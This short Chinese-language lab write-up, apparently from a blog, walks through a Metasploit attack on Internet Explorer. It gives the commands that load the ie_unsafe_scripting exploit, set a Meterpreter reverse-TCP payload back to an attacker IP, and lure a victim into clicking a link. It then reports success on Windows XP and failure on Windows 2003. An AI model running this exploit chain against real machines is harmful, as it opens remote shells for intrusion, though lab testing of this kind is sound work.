Rule

利用的漏洞代码为：exploit/windows/browser/ie_unsafe_scripting

命令如下：

set exploit/windows/browser/ie_unsafe_scripting
set payload windows/meterpreter/reverse_tcp

  

设置攻击者IP：

set LHOST 192.168.1.161

exploit

通过某种手段让对方点击你的链接：https://192.168.1.161:8080/ROyFJ7CRyWxuN
这里只是做为测试，所以就直接复制链接在目标主机的浏览器中打开。

然而，结果并不如愿，没能成功建立会话：

失败的原因在哪里呢？

原来，此漏洞必须满足一个条件，那就是图下的一个选项必须打开：

此时再在目标浏览器中（WIN XP系统）打开该链接时，出现如下：

终于成功建立了会话。

然而在WIN 2003系统中，仍然未能成功。